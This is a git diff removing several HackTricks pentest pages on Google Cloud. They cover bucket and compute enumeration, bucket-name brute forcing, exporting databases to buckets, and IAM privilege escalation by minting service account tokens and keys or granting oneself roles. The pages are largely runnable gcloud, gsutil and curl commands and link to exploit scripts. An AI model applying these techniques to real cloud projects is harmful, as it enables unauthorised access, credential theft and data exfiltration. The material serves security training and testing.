-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
-
-This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
-
-The following commands will help you explore this vector:
-
-```bash
-# List all storage buckets in project
-gsutil ls
-
-# Get detailed info on all buckets in project
-gsutil ls -L
-
-# List contents of a specific bucket (recursive, so careful!)
-gsutil ls -r gs://bucket-name/
-
-# Cat the context of a file without copying it locally
-gsutil cat gs://bucket-name/folder/object
-
-# Copy an object from the bucket to your local storage for review
-gsutil cp gs://bucket-name/folder/object ~/
-```
-
-If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them:
-
-```bash
-for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
-```
-
-## Search Open Buckets
-
-With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets:
-
-```bash
-#!/bin/bash
-
-############################
-# Run this tool to find buckets that are open to the public anywhere
-# in your GCP organization.
-#
-# Enjoy!
-############################
-
-for proj in $(gcloud projects list --format="get(projectId)"); do
- echo "[*] scraping project $proj"
- for bucket in $(gsutil ls -p $proj); do
- echo " $bucket"
- ACL="$(gsutil iam get $bucket)"
-
- all_users="$(echo $ACL | grep allUsers)"
- all_auth="$(echo $ACL | grep allAuthenticatedUsers)"
-
- if [ -z "$all_users" ]
- then
- :
- else
- echo "[!] Open to all users: $bucket"
- fi
-
- if [ -z "$all_auth" ]
- then
- :
- else
- echo "[!] Open to all authenticated users: $bucket"
- fi
- done
-
-```
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-compute-enumeration.md b/cloud-security/gcp-security/gcp-compute-enumeration.md
deleted file mode 100644
index efe25c13d..000000000
--- a/cloud-security/gcp-security/gcp-compute-enumeration.md
+++ /dev/null
@@ -1,171 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Compute instances
-
-It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them.
-
-The details may include:
-
-* **Network info**: Internal and external IP addresses, network and subnetwork names and security group
-* Custom **key/values in the metadata** of the instance
-* **Protection** information like `shieldedInstanceConfig` and `shieldedInstanceIntegrityPolicy`
-* **Screenshot** and the **OS** running
-* Try to **ssh** into it and try to **modify** the **metadata**
-
-```bash
-# Get list of zones
-# It's interesting to know which zones are being used
-gcloud compute regions list | grep -E "NAME|[^0]/"
-
-# List compute instances & get info
-gcloud compute instances list
-gcloud compute instances describe --project
-gcloud compute instances get-screenshot --project
-gcloud compute instances os-inventory list-instances #Get OS info of instances (OS Config agent is running on instances)
-
-# Try to SSH & modify metadata
-gcloud compute ssh
-gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
-```
-
-For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges** check this page:
-
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-## Custom Metadata
-
-Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint.
-
-```bash
-# view project metadata
-curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-
-# view instance metadata
-curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-```
-
-## Serial Console Logs
-
-Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them.
-
-You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-serial-port-output) to query the serial port logs:
-
-```
-gcloud compute instances get-serial-port-output instance-name \
- --port port \
- --start start \
- --zone zone
-```
-
-```
-$ gcloud compute images export --image test-image \
- --export-format qcow2 --destination-uri [BUCKET]
-```
-
-You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) the virtual disks from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
-
-```
-$ gcloud compute images list --no-standard-images
-```
-
-## Local Privilege Escalation and Pivoting
-
-If you compromises a compute instance you should also check the actions mentioned in this page:
-
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-# Images
-
-## Custom Images
-
-**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
-
-```
-gcloud compute images list --no-standard-images
-```
-
-You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
-
-```bash
-gcloud compute images export --image test-image \
- --export-format qcow2 --destination-uri [BUCKET]
-
-# Execute container inside a docker
-docker run --rm -ti gcr.io//secret:v1 sh
-```
-
-More generic enumeration:
-
-```bash
-gcloud compute images list
-gcloud compute images list --project windows-cloud --no-standard-images #non-Shielded VM Windows Server images
-gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images
-```
-
-## Custom Instance Templates
-
-An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
-
-```bash
-# List the available templates
-$ gcloud compute instance-templates list
-
-# Get the details of a specific template
-$ gcloud compute instance-templates describe [TEMPLATE NAME]
-```
-
-# More Enumeration
-
-| Description | Command |
-| ---------------------- | --------------------------------------------------------------------------------------------------------- |
-| **Stop** an instance | `gcloud compute instances stop instance-2` |
-| **Start** an instance | `gcloud compute instances start instance-2` |
-| **Create** an instance | `gcloud compute instances create vm1 --image image-1 --tags test --zone "" --machine-type f1-micro` |
-| **Download** files | `gcloud compute copy-files example-instance:~/REMOTE-DIR ~/LOCAL-DIR --zone us-central1-a` |
-| **Upload** files | `gcloud compute copy-files ~/LOCAL-FILE-1 example-instance:~/REMOTE-DIR --zone us-central1-a` |
-| List all **disks** | `gcloud compute disks list` |
-| List all disk types | `gcloud compute disk-types list` |
-| List all **snapshots** | `gcloud compute snapshots list` |
-| **Create** snapshot | `gcloud compute disks snapshot --snapshotname --zone $zone` |
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-databases-enumeration.md b/cloud-security/gcp-security/gcp-databases-enumeration.md
deleted file mode 100644
index 6a417ad8c..000000000
--- a/cloud-security/gcp-security/gcp-databases-enumeration.md
+++ /dev/null
@@ -1,129 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
-
-Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
-
-As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
-
-## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
-
-Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance.[Learn more](https://cloud.google.com/sql/docs/)
-
-If you find any of these instances in use, you could try to **access it from the internet** as they might be miss-configured and accessible.
-
-```bash
-# Cloud SQL
-gcloud sql instances list
-gcloud sql databases list --instance [INSTANCE]
-gcloud sql backups list --instance [INSTANCE]
-gcloud sql export sql gs:///cloudsql/export.sql.gz --database
-```
-
-## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
-
-Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
-
-```bash
-# Cloud Spanner
-gcloud spanner instances list
-gcloud spanner databases list --instance [INSTANCE]
-gcloud spanner backups list --instance [INSTANCE]
-```
-
-## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
-
-A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
-
-```bash
-# Cloud Bigtable
-gcloud bigtable instances list
-gcloud bigtable clusters list
-gcloud bigtable backups list --instance [INSTANCE]
-```
-
-## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
-
-Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
-
-```
-gcloud firestore indexes composite list
-gcloud firestore indexes fields list
-gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
-```
-
-## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
-
-The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
-
-## Memorystore
-
-Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
-
-```bash
-gcloud memcache instances list --region [region]
-# You should try to connect to the memcache instances to access the data
-
-gcloud redis instances list --region [region]
-gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
-```
-
-## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool)
-
-BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQueryβs serverless architecture lets you use SQL queries to answer your organizationβs biggest questions with zero infrastructure management. BigQueryβs scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction).
-
-```bash
-bq ls -p #List rojects
-bq ls -a #List all datasets
-bq ls #List datasets from current project
-bq ls #List tables inside the DB
-
-# Show information
-bq show ":"
-bq show ":."
-bq show --encryption_service_account
-
-bq query '' #Query inside the dataset
-
-# Dump the table or dataset
-bq extract ds.table gs://mybucket/table.csv
-bq extract -m ds.model gs://mybucket/model
-```
-
-Big query SQL Injection: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/README.md b/cloud-security/gcp-security/gcp-interesting-permissions/README.md
deleted file mode 100644
index abc9b2d0b..000000000
--- a/cloud-security/gcp-security/gcp-interesting-permissions/README.md
+++ /dev/null
@@ -1,77 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Introduction to GCP Privilege Escalation
-
-GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functionsβ¦\
-Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
-There are certain permissions that will allow a user to **get even more permissions** on the resource or third party resources, and thatβs what is called **privilege escalation** (also, the exploitation the vulnerabilities to get more permissions).
-
-Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**:
-
-* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.
-* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function.
- * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now itβs less frequent (but can still happen).
-
-Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may give you also access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA).
-
-{% hint style="warning" %}
-It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also.
-{% endhint %}
-
-{% hint style="info" %}
-The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
-{% endhint %}
-
-# Privilege Escalation to Principals
-
-Check all the **known permissions** that will allow you to **escalate privileges over other principals** in:
-
-{% content-ref url="gcp-privesc-to-other-principals.md" %}
-[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md)
-{% endcontent-ref %}
-
-# Privilege Escalation to Resources
-
-Check all the **known permissions** that will allow you to **escalate privileges over other resources** in:
-
-{% content-ref url="gcp-privesc-to-resources.md" %}
-[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md)
-{% endcontent-ref %}
-
-#
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
deleted file mode 100644
index fc445c892..000000000
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
+++ /dev/null
@@ -1,340 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-{% hint style="info" %}
-GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\
-If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it.
-{% endhint %}
-
-# IAM
-
-## iam.roles.update (iam.roles.get)
-
-If you have the mentioned permissions you will be able to update a role assigned to you and give you extra permissions to other resources like:
-
-```bash
-gcloud iam roldes update --project --add-permissions
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-## iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)
-
-This permission allows to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-## iam.serviceAccountKeys.create
-
-This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
-
-```bash
-gcloud iam service-accounts keys create --iam-account
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed.
-
-## iam.serviceAccounts.implicitDelegation
-
-If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png)
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method.
-
-## iam.serviceAccounts.signBlob
-
-The _iam.serviceAccounts.signBlob_ permission βallows signing of arbitrary payloadsβ in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-## iam.serviceAccounts.signJwt
-
-Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use but you can only sign JWT instead of any bytes.
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-## iam.serviceAccounts.setIamPolicy
-
-This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the βroles/iam.serviceAccountTokenCreatorβ role over the interesting SA:
-
-```bash
-gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
- --member="user:username@domain.com" \
- --role="roles/iam.serviceAccountTokenCreator"
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
-
-## iam.serviceAccounts.actAs
-
-This means that as part of creating certain resources, you must βactAsβ the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with.
-
-**There are multiple individual methods that use \_iam.serviceAccounts.actAs**\_**, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods.
-
-## iam.serviceAccounts.getOpenIdToken
-
-This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
-
-According to this [**interesting post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b), it's necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT.
-
-You can generate an OpenIDToken (if you have the access) with:
-
-```bash
-# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA
-gcloud auth activate-service-account --key-file=/path/to/svc_account.json
-# Then, generate token
-gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com
-```
-
-Then you can just use it to access the service with:
-
-```bash
-curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app
-```
-
-Some services that support authentication via this kind of tokens are:
-
-* [Google Cloud Run](https://cloud.google.com/run/)
-* [Google Cloud Functions](https://cloud.google.com/functions/docs/)
-* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto)
-* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC)
-
-You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
-
-# resourcemanager
-
-## resourcemanager.organizations.setIamPolicy
-
